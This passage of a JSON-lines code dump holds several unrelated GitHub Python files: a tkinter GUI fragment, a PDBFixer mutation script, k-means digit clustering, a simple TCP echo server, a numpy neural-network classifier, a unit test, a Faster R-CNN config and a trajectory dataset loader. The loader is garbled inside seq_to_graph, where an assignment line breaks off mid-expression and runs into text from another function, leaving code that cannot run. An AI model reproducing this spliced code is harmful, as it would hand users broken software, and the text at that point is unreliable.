bg = 'black')\n delMemberFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n resultTestFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n membersFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n tableFrame = tk.Frame(root, width = 1024, 
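# every screen is a same-sized frame stacked in the same grid cell;
# raiseFrame() (tkraise) brings the active one to the front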
height = 768, bg = 'black')\n \n for frame in (menuFrame, cmdFrame, prepFrame, resultFrame, erdFrame, schemaFrame, memberFrame, contArtFrame, delMemberFrame, resultTestFrame, membersFrame, tableFrame):\n frame.grid(row=0, column=0)\n\n menuFrame.pack_propagate(0)\n prepFrame.pack_propagate(0)\n cmdFrame.pack_propagate(0)\n resultFrame.pack_propagate(0)\n erdFrame.pack_propagate(0)\n schemaFrame.pack_propagate(0)\n memberFrame.pack_propagate(0)\n contArtFrame.pack_propagate(0)\n delMemberFrame.pack_propagate(0)\n resultTestFrame.pack_propagate(0)\n membersFrame.pack_propagate(0)\n tableFrame.pack_propagate(0)\n\n\n #Fonts\n titleFont = ('Calibri', 20)\n largeFont = ('Calibri', 18)\n middleFont = ('Calibri', 14)\n smallFont = ('Calibri', 12)\n commentFont = ('Calibri', 10)\n \n #Colors\n slate = '#26282A'\n \n #Functions\n\n #GUI\n createGUI()\n \n #Close Connection with Db\n db.close()","repo_name":"evangeliagaga/DatabasesProject_Team08","sub_path":"SourceCode/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":27633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27535624700","text":"import pdbfixer\nimport tempfile\nfrom openmm.app import PDBFile\nimport openmm.app as app\n\n\ndef gen_pdb_mutate(path_data, pdb_id, chain, mut_info, mut_resid):\n \"\"\"This function mutates the wild residue type to mutant residue and fix the pdb block accordingly. This function\n uses PDBFixer \"\"\"\n temp_file = path_data + pdb_id.lower() + '.pdb'\n fixer0 = pdbfixer.PDBFixer(filename=temp_file)\n\n fixer0.findMissingResidues()\n # only add missing residues in the middle of the chain, do not add terminal ones\n chains = list(fixer0.topology.chains())\n keys = fixer0.missingResidues.keys()\n missingResidues = dict()\n for key in keys:\n chainA = chains[key[0]]\n if not (key[1] == 0 or key[1] == len(list(chainA.residues()))):\n missingResidues[key] = fixer0.missingResidues[key]\n fixer0.missingResidues = missingResidues\n\n fixer0.findMissingAtoms()\n fixer0.addMissingAtoms()\n PDBFile.writeFile(fixer0.topology, fixer0.positions, open(temp_file, 'w'), keepIds=True)\n #print(pdb_id.lower(), chain, mut_info)\n temp_mutfile = path_data + pdb_id.lower() + '_' +chain+ '_' + mut_info +'.pdb'\n #print(temp_mutfile)\n '''if os.path.exists(temp_mutfile):\n return'''\n fixer = pdbfixer.PDBFixer(filename=path_data + pdb_id.lower() + '.pdb')\n fixer.applyMutations([mut_info], chain)\n\n fixer.findMissingResidues()\n # only add missing residues in the middle of the chain, do not add terminal ones\n chains = list(fixer.topology.chains())\n keys = fixer.missingResidues.keys()\n missingResidues = dict()\n for key in keys:\n chain = chains[key[0]]\n if not (key[1] == 0 or key[1] == len(list(chain.residues()))):\n missingResidues[key] = fixer.missingResidues[key]\n fixer.missingResidues = missingResidues\n\n #fixer.findMissingAtoms()\n #fixer.addMissingAtoms()\n with tempfile.NamedTemporaryFile(mode='w+') as temp_pdb:\n app.PDBFile.writeFile(fixer.topology, fixer.positions, temp_pdb)\n temp_pdb.flush()\n PDBFile.writeFile(fixer.topology, fixer.positions, open(temp_mutfile, 'w'), keepIds=True)\n","repo_name":"ShahidIqb/PROST-3D","sub_path":"mutate_pdb.py","file_name":"mutate_pdb.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3309549169","text":"from sklearn import svm\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot 
as plt\nimport numpy as np\nimport csv\nimport random as rd\nimport time\nimport pickle\nimport copy\n\ndef load_data(PATH):\n \"\"\" @brief load the data of the data set \n @param PATH : string, relative path of the .csv file\n \n @return np array(n) labels : array of n labels\n @return np array(n) images : array of n images\"\"\"\n\n with open(PATH) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n images = []\n labels = []\n for row in csv_reader:\n images.append(np.array(row[0:len(row)-1]).astype(np.float))\n labels.append(row[-1])\n return(np.array(labels),np.array(images))\n\ndef init_centroids_random(k, data):\n \"\"\" @brief initialize centroids by taking k random points in the dataset \n @param k : number of centroids to generate\n @param data: np array(k,m), images forming the dataset\n \n @return np array (k, n) : array of k centroids\"\"\"\n\n centroid_indexes = np.floor(np.random.random_sample((k,))*len(data)).astype(int)\n return np.take(data,centroid_indexes, axis=0)\n\ndef init_centroids_each_class(k, data, labels):\n \"\"\" @brief initialize centroids by taking the first point of each class in the dataset \n\n @param k : number of centroids to generate\n @param data: np array(n,m), images forming the dataset\n @param labels: np array(n), the labels corresponding to the dataset\n \n @return np array (k, m) of k centroids\"\"\"\n\n centroid_indexes= np.empty(k)\n for i in range(k):\n centroid_indexes[i] = np.where(labels == str(i))[0][0]\n\n centroid_indexes = centroid_indexes.astype(int)\n centroids = np.take(data,centroid_indexes, axis=0)\n\n return centroids\n\ndef compute_clusters(centroids, data):\n \"\"\" @brief agregate all the points in the dataset into clusters\n\n @param centroids: np array (k,m) of k points acting as cluster centroids\n @param data: np array(n,m), images forming the dataset\n \n @return np array (n) of assigned cluster for each data point\"\"\"\n\n clusters = np.empty(len(data))\n for i, image in enumerate(data):\n diff = centroids-image\n distances = np.sum(diff*diff, axis=1)\n clusters[i] = np.argmin(distances)\n\n return clusters\n\ndef comp_new_centroids(k, data, clusters):\n \"\"\" @brief compute new centroids by averaging all the images in a cluster\n\n @param k: number of centroids to generate\n @param data: np array (n) of assigned cluster for each data point\n \n @return np array (k, m) of k new centroids\"\"\"\n\n centroids = np.empty((k, len(data[0])))\n for i in range(k):\n cluster_indexes = np.where(clusters == i)[0]\n cluster_data = np.take(data, cluster_indexes, axis=0)\n centroids[i] = np.mean(cluster_data, axis=0)\n\n return centroids\n\ndef compute_confusion_matrix(k,data,labels,clusters):\n \"\"\" @brief Compute the confusion matrix from results obtained on a testing data set\n\n @param k: number of classes (or clusters)\n @param data : np.array (n), testing data set\n @param labels : np.array (n), labels of the testing data set\n @param clusters: np array (n) of assigned cluster for each data point\n \n @return np array (k,k), confusion matrix\"\"\"\n\n counters = np.zeros((k,k))\n for i,index in enumerate(clusters):\n counters[int(labels[i]),int(index)]+=1\n \n for i in range(k):\n argmax_c = np.argmax(counters[:,i])\n max_c = np.max(counters[:,i])\n sum_c = np.sum(counters[:,i])\n\n print(\"Predicted class \"+str(i)+\" : \")\n print(\"most common element : \"+str(argmax_c)+ \" (\" + str(max_c) + \" of \" + str(sum_c)+\")\")\n \n return(counters)\n\ndef plot_confusion_matrix(numbers, cm, title='Confusion 
matrix', cmap=plt.cm.RdPu):\n \"\"\" @brief Plot the confusion matrix\n\n @param numbers: list(k), labels of the classes to be put on the side of the matrix\n @param cm : np.array (k,k), confusion matrix\"\"\"\n \n plt.figure()\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(numbers))\n plt.xticks(tick_marks, numbers)\n plt.yticks(tick_marks, numbers)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.show()\n\ndef compute_image(row):\n \"\"\" @brief compute the nxn matrix of the image contained in a l² items array\n\n @param row : np array(l²), array containing the image\n \n @return np array (l, l), matrix representing the image \"\"\"\n\n l = int(np.sqrt(len(row)))\n picture = np.empty((l,l))\n for i in range(l):\n picture[i,:] = row[i*l:(i+1)*l]\n\n return(picture)\n\ndef compute_mean_image(index_cluster,clusters,data):\n \"\"\" @brief Compute the mean image associated to a cluster (or class) of a testing data set\n\n @param index_cluster : index of the cluster\n @param clusters: np array (n) of assigned cluster for each data point\n @param data : np.array (n), testing data set\n \n @return np array (l, l), matrix representing the mean image \"\"\"\n\n l = int(np.sqrt(len(data[0])))\n M = np.zeros((l,l))\n c=0\n\n for index in clusters:\n if(index==index_cluster):\n c+=1\n\n for i,index in enumerate(clusters):\n if(index==index_cluster):\n M += compute_image(data[i])/c\n \n return(M)\n\ndef plot_mean_images(numbers, clusters,data):\n \"\"\" @brief Plot the mean image associated to a cluster (or class) of a testing data set\n\n @param numbers: list(k), labels of the classes to be put on the each mean image\n @param clusters: np array (n) of assigned cluster for each data point\n @param data : np.array (n), testing data set\"\"\"\n\n fig = plt.figure(figsize=(10,8))\n A = []\n for i in range(1,len(numbers)):\n A.append(fig.add_subplot(520+i))\n A.append(fig.add_subplot(5,2,10))\n\n for i,a in enumerate(A):\n a.imshow(compute_mean_image(i,clusters,data),cmap='gray')\n a.set_title(numbers[i])\n fig.suptitle(\"Mean image of each cluster\")\n plt.show()\n\ndef main():\n k= 10\n random_init = True\n labels_train, images_train = load_data('optdigits_train.csv')\n labels_test, images_test = load_data('optdigits_test.csv')\n\n if random_init:\n centroids= init_centroids_random(k, images_train)\n else:\n centroids = init_centroids_each_class(k, images_train, labels_train)\n\n old_centroids= np.zeros(centroids.shape)\n\n nb_it = 0\n nb_max_it = 100\n \n while not np.all(centroids == old_centroids) and nb_it < nb_max_it:\n clusters = compute_clusters(centroids, images_train)\n old_centroids = centroids\n centroids = comp_new_centroids(k, images_train, clusters)\n nb_it+=1\n\n print(\"k-mean algorithm was ran in \"+str(nb_it)+\" iterations\")\n\n if random_init:\n #if initialization was done randomly, we try to reorganize the clusters in order to have all zeros in cluster zero\n # all ones in cluster one etc...\n\n # first we find out what if the most represented number in each cluster\n predicted_numbers = np.zeros(k)\n max_counts = np.zeros(k)\n for i in range(k):\n cluster = np.where(clusters == i)[0]\n true_labels = labels_train[cluster]\n unique, counts = np.unique(true_labels, return_counts=True)\n max_counts[i] = np.amax(counts)\n predicted_numbers[i] = unique[np.argmax(counts)]\n\n print(predicted_numbers)\n unique, counts = np.unique(predicted_numbers, return_counts = True)\n\n # if a 
number is the most represented in several clusters, \n        # then we keep the prediction for the best one and assign other numbers to the remaining clusters\n\n        while len(unique) != k:\n            # finding out which numbers haven't been assigned to any cluster\n            missing_elements = np.empty(0)\n            for i in range(k):\n                if not i in unique:\n                    missing_elements = np.append(missing_elements, i)\n\n            # running through ambiguous clusters, and assigning the worst clusters to the missing elements\n            for ambiguous_class in unique[np.where(counts != 1)[0]]:\n                ambiguous_class_indexes = np.where(predicted_numbers == ambiguous_class)[0]\n                max_counts_ambiguous_class = np.take(max_counts, ambiguous_class_indexes)\n\n                for i, candidate_class_index in enumerate(ambiguous_class_indexes):\n                    if i != np.argmax(max_counts_ambiguous_class):\n                        predicted_numbers[ambiguous_class_indexes[i]] = np.random.choice(missing_elements)\n                \n                unique, counts = np.unique(predicted_numbers, return_counts = True)\n\n\n        # mapping the old cluster indexes to the new one\n        new_clusters = copy.deepcopy(clusters)\n        new_centroids = copy.deepcopy(centroids)\n        for i in range(k):\n            new_clusters[clusters == i] = predicted_numbers[i]\n            new_centroids[int(predicted_numbers[i])] = centroids[i]\n\n        clusters = new_clusters\n        centroids = new_centroids\n\n\n    ## prediction\n    clusters_test = compute_clusters(centroids, images_test)\n\n    numbers = ['0','1','2','3','4','5','6','7','8','9']\n\n    matrix = compute_confusion_matrix(k,images_test,labels_test,clusters_test)\n    normalized_matrix = matrix/matrix.sum(axis=1)\n\n    plot_confusion_matrix(numbers,matrix)\n\n    plot_confusion_matrix(numbers,normalized_matrix, title='Normalized confusion matrix')\n\n    plot_mean_images(numbers,clusters_test,images_test)\n\nmain()\n\n","repo_name":"CarolinePascal/ROB311-TP6","sub_path":"TP6.py","file_name":"TP6.py","file_ext":"py","file_size_in_byte":9613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"15646198512","text":"import socket\nimport subprocess\n\ndef init_server(server_address):\n    socket_server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n    try:\n        print(\"[*] Server is trying to bind to address {}:{}\".format(server_address[0], server_address[1]))\n        socket_server.bind(server_address)\n        print(\"[*] Server has successfully bound.\")\n    except socket.error as serr:\n        print(str(serr))\n\n    socket_server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n    if hasattr(socket,\"SO_REUSEPORT\"):\n        socket_server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEPORT,1)\n\n    socket_server.listen(5)\n\n    print(\"[*] Server listening at {}:{}\".format(server_address[0],server_address[1]))\n\n    try:\n        while True:\n            client_socket,client_addr=socket_server.accept()\n            print(\"[*] Client has connected {}:{}\".format(client_addr[0],client_addr[1]))\n            handle(client_socket)\n    except KeyboardInterrupt as kerr:\n        print(\"[*] Server is closing...\")\n        socket_server.close()\n\ndef handle(client_socket):\n    MAX_RECV=1024\n\n    recv_size=1\n    while recv_size:\n        data=client_socket.recv(MAX_RECV).decode('utf-8')\n\n        if not data:\n            print(\"[*] Client just disconnected\")\n            break\n\n        recv_size=len(data)\n        client_socket.send(data.encode(\"utf-8\"))\n        data=\"\"\n\nif __name__==\"__main__\":\n    
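# example LAN address from the original author; adjust host/port for your own network\n    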
init_server((\"10.10.2.223\",8080))","repo_name":"PalagesiuCezar/Networking","sub_path":"Telnet/Telnet_server.py","file_name":"Telnet_server.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7664172459","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Model:\r\n def __init__(self):\r\n print(\"self\")\r\n self.cost = Cost()\r\n self.act = Activation()\r\n self.model=[]\r\n\r\n def initialize_parameters_deep(self,layer_dims):\r\n np.random.seed(3)\r\n self.model=layer_dims\r\n parameters = {}\r\n L = len(layer_dims) # number of layers in the network\r\n \r\n for l in range(1, L):\r\n parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * 0.01\r\n parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))\r\n assert(parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))\r\n assert(parameters['b' + str(l)].shape == (layer_dims[l], 1))\r\n return parameters\r\n \r\n def linear_forward(self,A, W, b):\r\n \r\n Z = np.dot(W, A) + b \r\n assert(Z.shape == (W.shape[0], A.shape[1]))\r\n cache = (A, W, b)\r\n \r\n return Z, cache\r\n def linear_activation_forward(self,A_prev, W, b, activation):\r\n\r\n if activation == \"sigmoid\":\r\n Z, linear_cache = self.linear_forward(A_prev, W, b)\r\n A, activation_cache = self.act.sigmoid(Z)\r\n \r\n elif activation == \"relu\":\r\n Z, linear_cache = self.linear_forward(A_prev, W, b)\r\n A, activation_cache = self.act.relu(Z)\r\n \r\n elif activation == \"linear\":\r\n Z, linear_cache = self.linear_forward(A_prev, W, b)\r\n A, activation_cache = self.act.linear(Z)\r\n \r\n assert (A.shape == (W.shape[0], A_prev.shape[1]))\r\n cache = (linear_cache, activation_cache)\r\n \r\n return A, cache\r\n\r\n def linear_backward(self,dZ, linear_cache):\r\n A_prev, W, b = linear_cache \r\n m = A_prev.shape[1]\r\n\r\n dW = (1/m)*np.dot(dZ,A_prev.T)\r\n db = (1/m)*np.sum(dZ, axis = 1,keepdims= True)\r\n\r\n dA_prev = np.dot(W.T,dZ)\r\n\r\n return dA_prev,dW,db\r\n\r\n def linear_activation_backward(self,dA, cache, activation):\r\n linear_cache, activation_cache = cache\r\n if activation == \"relu\":\r\n dZ = self.act.relu_backward(dA, activation_cache)\r\n \r\n elif activation == \"sigmoid\":\r\n dZ = self.act.sigmoid_backward(dA, activation_cache)\r\n \r\n \r\n dA_prev, dW, db = self.linear_backward(dZ, linear_cache)\r\n return dA_prev, dW, db\r\n\r\n def update_parameters(self,parameters, grads, learning_rate):\r\n L = len(parameters) // 2 # number of layers in the neural network\r\n for l in range(L):\r\n parameters[\"W\" + str(l + 1)] = parameters[\"W\" + str(l + 1)] - learning_rate * grads[\"dW\" + str(l + 1)]\r\n parameters[\"b\" + str(l + 1)] = parameters[\"b\" + str(l + 1)] - learning_rate * grads[\"db\" + str(l + 1)]\r\n return parameters\r\n\r\n \r\n\r\n \r\nclass Cost:\r\n def __init__(self,loss=\"Cross\"):\r\n print(\"Cost\")\r\n self.loss=loss\r\n \r\n def compute_cost(self,AL, Y):\r\n m = Y.shape[1]\r\n cost=0\r\n if self.loss==\"Cross\":\r\n cost = (-1 / m) * np.sum(np.multiply(Y, np.log(AL)) + np.multiply(1 - Y, np.log(1 - AL)))\r\n cost = np.squeeze(cost) \r\n assert(cost.shape == ())\r\n return cost\r\n\r\n def derive_cost(self,AL, Y):\r\n m = Y.shape[1]\r\n dAL=0\r\n if self.loss==\"Cross\":\r\n dAL = - (np.divide(Y, AL) - np.divide(1 - Y, 1 - AL))\r\n return dAL\r\n \r\n \r\nclass Activation:\r\n def __init__(self,act=\"relu\"):\r\n print(\"Activation\")\r\n self.act=act\r\n\r\n def 
relu(self,input1):\r\n        ANS = np.zeros(input1.shape)\r\n        for i in range(0,ANS.shape[0]):\r\n            for j in range(0,ANS.shape[1]):\r\n                ANS[i,j] = max(0, input1[i,j])\r\n        #return ANS , input1 \r\n        cache = input1\r\n        return ANS , cache  \r\n\r\n    def sigmoid(self,Z) :\r\n        A = 1/(1 + np.exp(-1 * Z))\r\n        cache = Z\r\n        return A,cache\r\n    def linear(self,Z) :\r\n        return Z,Z\r\n    \r\n    def relu_backward(self,dA, Z) :\r\n\r\n        grad_relu = np.zeros(Z.shape)\r\n        for i in range(Z.shape[0]):\r\n            for j in range(Z.shape[1]):\r\n                if Z[i,j] >= 0 :\r\n                    grad_relu[i,j] = 1\r\n                else:\r\n                    grad_relu[i,j] = 0\r\n        return dA * grad_relu  \r\n\r\n    def sigmoid_backward(self,dA, Z):\r\n        out,cache = self.sigmoid(Z) \r\n        grad_sigmoid = out*(1-out)\r\n        return dA * grad_sigmoid\r\n\r\n\r\nclass Classifier(Model):\r\n    def __init__(self):\r\n        print(\"Classifier\")\r\n        self.cost = Cost()\r\n        self.act = Activation()\r\n        self.para=[]\r\n        self.Loss=[]\r\n        Model.__init__(self)\r\n    def L_model_forward(self,X, parameters):\r\n\r\n        caches = []\r\n        A = X\r\n        L = len(parameters) // 2                  # number of layers in the neural network\r\n        \r\n        # Implement [LINEAR -> RELU]*(L-1). Add \"cache\" to the \"caches\" list.\r\n        for l in range(1, L):\r\n            A_prev = A \r\n            ### START CODE HERE ### (≈ 2 lines of code)\r\n            A, cache = Model.linear_activation_forward(self,A_prev, \r\n                                                 parameters['W' + str(l)], \r\n                                                 parameters['b' + str(l)], \r\n                                                 activation='relu')\r\n            caches.append(cache)\r\n            \r\n        AL, cache = Model.linear_activation_forward(self,A, \r\n                                             parameters['W' + str(L)], \r\n                                             parameters['b' + str(L)], \r\n                                             activation='sigmoid')\r\n        caches.append(cache)\r\n        \r\n        assert(AL.shape == (1, X.shape[1]))\r\n        \r\n        return AL,caches\r\n    def L_model_backward(self,AL, Y, caches):\r\n        grads = {}\r\n        L = len(caches)  # the number of layers\r\n        m = AL.shape[1]\r\n        Y = Y.reshape(AL.shape)  # after this line, Y is the same shape as AL\r\n        \r\n        \r\n        dAL = self.cost.derive_cost(AL,Y)\r\n        \r\n        \r\n        \r\n        current_cache = caches[-1]\r\n        grads[\"dA\" + str(L)], grads[\"dW\" + str(L)], grads[\"db\" + str(L)] = Model.linear_activation_backward(self,dAL,current_cache,\"sigmoid\")\r\n        \r\n        for l in reversed(range(L-1)):\r\n            current_cache = caches[l]\r\n            # propagate the gradient coming from the layer above, not dAL itself\r\n            dA_prev_temp, dW_temp, db_temp = Model.linear_activation_backward(self,grads[\"dA\" + str(l + 2)],current_cache,\"relu\")\r\n            grads[\"dA\" + str(l + 1)] = dA_prev_temp\r\n            grads[\"dW\" + str(l + 1)] = dW_temp\r\n            grads[\"db\" + str(l + 1)] = db_temp\r\n        \r\n        return grads\r\n\r\n    def Train(self,X, Y, layers_dims, learning_rate=0.075, num_iterations=500, print_cost=False):\r\n        np.random.seed(1)\r\n        costs = []\r\n        param=[]\r\n        parameters = Model.initialize_parameters_deep(self,layers_dims)\r\n        #print(parameters,X)\r\n        for i in range(0, num_iterations):\r\n            AL, caches = self.L_model_forward(X, parameters)\r\n            cost = self.cost.compute_cost(AL, Y)\r\n            \r\n            grads = self.L_model_backward(AL, Y, caches)\r\n            parameters = self.update_parameters(parameters, grads, learning_rate)\r\n            self.Loss.append(cost)\r\n            self.para.append(parameters)\r\n            param.append(parameters)\r\n            if print_cost and i % 100 == 0:\r\n                print (\"Cost after iteration %i: %f\" % (i, cost))\r\n            if print_cost and i % 100 == 0:\r\n                costs.append(cost)\r\n            \r\n        # plot the cost\r\n        plt.plot(np.squeeze(self.Loss))\r\n        plt.ylabel('cost')\r\n        plt.xlabel('iterations (per tens)')\r\n        plt.title(\"Learning rate =\" + str(learning_rate))\r\n        plt.show()\r\n\r\n        return parameters\r\n\r\ndef predict(X, parameters,model):\r\n\r\n    AL,caches = model.L_model_forward(X, parameters)\r\n    print(AL)\r\n    
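# threshold the sigmoid outputs at 0.5 to obtain binary class predictions\r\n    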
predictions = AL > 0.5\r\n\r\n    return predictions","repo_name":"Varanasi5213/Minor-2","sub_path":"Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"84473199","text":"from crypta.cm.services.common.data.python.back_reference import TBackReference\nfrom crypta.cm.services.common.data.python.id import TId\n\n\nYANDEXUID_TYPE = \"yandexuid\"\nEXT_NS = \"ext_ns\"\nEXT_NS_2 = \"ext_ns_2\"\n\n\ndef test_empty():\n    back_ref = TBackReference(TId(\"\", \"\"), [])\n\n    ref_id = TId(\"\", \"\")\n    ref_refs = set()\n\n    assert ref_id == back_ref.GetId()\n    assert ref_refs == back_ref.GetRefs()\n\n\ndef test_full():\n    id = TId(YANDEXUID_TYPE, \"100500\")\n    ext_ids = {TId(EXT_NS, \"value-1\"), TId(EXT_NS_2, \"value-2\")}\n    back_ref = TBackReference(id, ext_ids)\n\n    assert id == back_ref.GetId()\n    assert ext_ids == back_ref.GetRefs()\n    assert id != TId(\"foo\", \"bar\")\n\n\ndef test_equality():\n    id_1 = TId(YANDEXUID_TYPE, \"100500\")\n    ext_ids_1 = [TId(EXT_NS, \"1500000000\"), TId(EXT_NS_2, \"1600000000\")]\n    back_ref_1 = TBackReference(id_1, ext_ids_1)\n    back_ref_1_dup = TBackReference(id_1, ext_ids_1)\n\n    id_2 = TId(YANDEXUID_TYPE, \"200500\")\n    ext_ids_2 = [TId(EXT_NS, \"1500\"), TId(EXT_NS, \"1600\")]\n    back_ref_2 = TBackReference(id_2, ext_ids_2)\n\n    assert back_ref_1 == back_ref_1\n    assert back_ref_1_dup == back_ref_1\n    assert back_ref_2 != back_ref_1\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/test_back_reference.py","file_name":"test_back_reference.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"17640992405","text":"from pprint import pprint\n\n\n# Default Configs for training\n# NOTE that config items could be overwritten by passing arguments through the command line.\n# e.g. 
--voc-data-dir='./data/'\n\nclass Config:\n    # Can be 'voc', 'multiclass', 'oneclass', 'vott', or 'iwildcam'\n    dataset = 'vott' \n\n    # Not defined here; passed in via train.sh\n    train_annotation = ''  # ../train_bboxes.json\n    val_annotation = ''  # ../val_bboxes.json\n    image_root = ''  # ../images/\n    voc_data_dir = ''  # ../VOCdevkit/VOC2007/\n    train_image_dir = ''  # Only for VOTT format\n    val_image_dir = ''  # Only for VOTT format\n\n    validate_only = False\n\n    min_size = 600  # image resize\n    max_size = 1000  # image resize\n    num_workers = 4\n    test_num_workers = 4\n\n    # sigma for l1_smooth_loss\n    rpn_sigma = 3.\n    roi_sigma = 1.\n    # Whether to weight background by 1 / number proposals in classification of RPN\n    reduce_bg_weight = False\n\n    # param for optimizer\n    # 0.0005 in origin paper but 0.0001 in tf-faster-rcnn\n    weight_decay = 0.0005\n    lr_decay = 0.1  # 1e-3 -> 1e-4\n    lr = 0.0003\n    lr_schedule = [7,9]\n    num_epochs = 13\n\n    # visualization\n    env = 'faster-rcnn'  # visdom env\n    port = 8097\n    plot_every = 40  # vis every N iter\n    snapshot_every = 50000 # vis every N iter\n\n    # preset\n    data = 'voc'\n    pretrained_model = 'vgg16'\n\n    batch_size = 1\n\n    # not fully implemented yet\n    use_cuda = True\n    use_adam = False # Use Adam optimizer\n    use_chainer = False # try match everything as chainer\n    use_drop = False # use dropout in RoIHead\n    # debug\n    debug_file = '/tmp/debugf'\n\n    test_num = 1000\n    # model\n    load_path = None\n\n    caffe_pretrain = False # use caffe pretrained model instead of torchvision\n    caffe_pretrain_path = 'data/vgg16_caffe.pth'\n\n    def _parse(self, kwargs):\n        state_dict = self._state_dict()\n        for k, v in kwargs.items():\n            if k not in state_dict:\n                raise ValueError('Unknown Option: \"--%s\"' % k)\n            setattr(self, k, v)\n\n        print('======user config========')\n        pprint(self._state_dict())\n        print('==========end============')\n\n    def _state_dict(self):\n        return {k: getattr(self, k) for k, _ in Config.__dict__.items() \\\n                if not k.startswith('_')}\n\n\nopt = Config()\n","repo_name":"rbavery/animal_detector","sub_path":"SpeciesClassification/FasterRCNNDetection/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} {"seq_id":"10721943881","text":"\"\"\"\n    trajectory dataset code from Social-STGCNN: A Social Spatio-Temporal Graph Convolutional Neural Network for Human Trajectory Prediction\n\"\"\"\n\nimport os\nimport math\nimport sys\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.nn.functional as Func\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.module import Module\nimport dill\nimport torch.optim as optim\n\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom numpy import linalg as LA\nimport networkx as nx\nfrom tqdm import tqdm\nimport time\nfrom scipy.interpolate import interp1d\n\nM = np.array([[ 2.84217540e-02,  2.97335273e-03,  6.02821031e+00],\n       [-1.67162992e-03,  4.40195878e-02,  7.29109248e+00],\n       [-9.83343172e-05,  5.42377797e-04,  1.00000000e+00]])\n\nneighbor_thred = 1e5\n\ndef anorm(p1,p2): \n    NORM = math.sqrt((p1[0]-p2[0])**2+ (p1[1]-p2[1])**2)\n    if NORM ==0:\n        return 0\n    return 1/(NORM)\n                \ndef seq_to_graph(seq_,seq_rel,norm_lap_matr = True):\n    seq_ = seq_.squeeze()\n    seq_rel = seq_rel.squeeze()\n    seq_len = seq_.shape[2]\n    max_nodes = seq_.shape[0]\n\n    \n    V = np.zeros((seq_len,max_nodes,2))\n    A = 
np.zeros((seq_len,max_nodes,max_nodes))\n    Ab = np.zeros((seq_len,max_nodes,max_nodes)) #neig_mat\n    for s in range(seq_len):\n        step_ = seq_[:,:,s]\n        step_rel = seq_rel[:,:,s]\n        for h in range(len(step_)): \n            V[s,h,:] = step_rel[h]\n            A[s,h,h] = 1\n            Ab[s,h,h] = 1 # neig_mat\n            for k in range(h+1,len(step_)):\n                l2_norm = anorm(step_[h],step_[k])\n                A[s,h,k] = l2_norm\n                A[s,k,h] = l2_norm\n                Ab[s,h,k] = int((1/l2_norm) Non Linear 0-> Linear\n    \"\"\"\n    t = np.linspace(0, traj_len - 1, traj_len)\n    res_x = np.polyfit(t, traj[0, -traj_len:], 2, full=True)[1]\n    res_y = np.polyfit(t, traj[1, -traj_len:], 2, full=True)[1]\n    if res_x + res_y >= threshold:\n        return 1.0\n    else:\n        return 0.0\ndef read_file(_path, delim='\\t', normalize = False):\n    data = []\n    if delim == 'tab':\n        delim = '\\t'\n    elif delim == 'space':\n        delim = ' '\n    with open(_path, 'r') as f:\n        for line in f:\n            line = line.strip().split(delim)\n            line = [float(i) for i in line]\n            data.append(line)\n    dataf = pd.DataFrame(data,columns=['frame','id','pos_x','pos_y'])\n    dataf_new = pd.DataFrame()\n    ids = dataf.id.unique()\n    time_unit=1/12.5\n    for _id in ids:\n        dataf_i = dataf[dataf.id==_id]\n        begin_f,end_f = dataf_i.frame.min(),dataf_i.frame.max()\n        if end_f-begin_f<30:\n            continue\n        sample_f = np.arange(begin_f, end_f+1, 25*time_unit)\n        # image 2 world coord\n        image_coordination = np.concatenate((dataf_i.pos_x.values[:,np.newaxis], dataf_i.pos_y.values[:,np.newaxis], np.ones((len(dataf_i.pos_x),1))), axis=1)\n        world_coordination = np.einsum('ij,nj->ni', M, image_coordination)\n        interp_x = interp1d(dataf_i.frame.values, world_coordination[:,0]/world_coordination[:, 2], kind='cubic')(sample_f)\n        interp_y = interp1d(dataf_i.frame.values, world_coordination[:,1]/world_coordination[:, 2], kind='cubic')(sample_f)\n        \n        dataf_new=pd.concat([dataf_new,pd.DataFrame([sample_f,_id*np.ones(len(sample_f)),interp_x,interp_y]).T])\n    dataf_new.columns=['frame','id','inter_x','inter_y']\n    dataf_new.frame=dataf_new.frame.astype(int)\n    dataf_new.id=dataf_new.id.astype(int)\n    dataf_new.sort_values('frame',inplace=True)\n    if normalize:\n        dataf_new.inter_x = dataf_new.inter_x-dataf_new.inter_x.mean()\n        dataf_new.inter_y = dataf_new.inter_y-dataf_new.inter_y.mean()\n    return dataf_new.to_numpy()\n\nclass TrajectoryDataset(Dataset):\n    \"\"\"Dataloader for the 